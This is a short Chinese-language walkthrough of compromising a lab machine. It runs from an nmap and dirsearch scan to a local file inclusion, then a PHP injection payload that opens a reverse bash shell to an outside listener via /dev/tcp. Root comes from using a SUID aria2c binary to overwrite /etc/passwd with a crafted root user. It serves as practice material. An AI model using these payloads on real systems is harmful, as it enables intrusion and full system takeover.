信息收集
扫描全端口以发现服务
nmap -n -v --max-retries=0 -p- 172.16.33.99 --max-rate=500 -Pn
访问80端口,使用dirsearch扫描目录
目录中没发现啥可以利用的
拿shell
随便点点,疑似有路径可以进行本地文件包含
想看 /etc/passwd 失败了
可以尝试一下这种方法
成功读取到 /etc/passwd,尝试执行反弹shell命令
' and die(system('bash -c "exec bash -i >& /dev/tcp/10.8.0.243/6666 0>&1"')) or '
直接打上去好像弹不出来,尝试进行url编码
提权
查找具有suid权限的文件
aria2c 是 下载文件的程序,可以尝试用于覆盖 /etc/passwd
将 /etc/passwd 保存到 kali上,生成一个具有root权限的用户
openssl passwd -1 -salt a 123
生成后写入本地的passwd,在靶机上使用aria2c把文件下下来覆盖
成功提权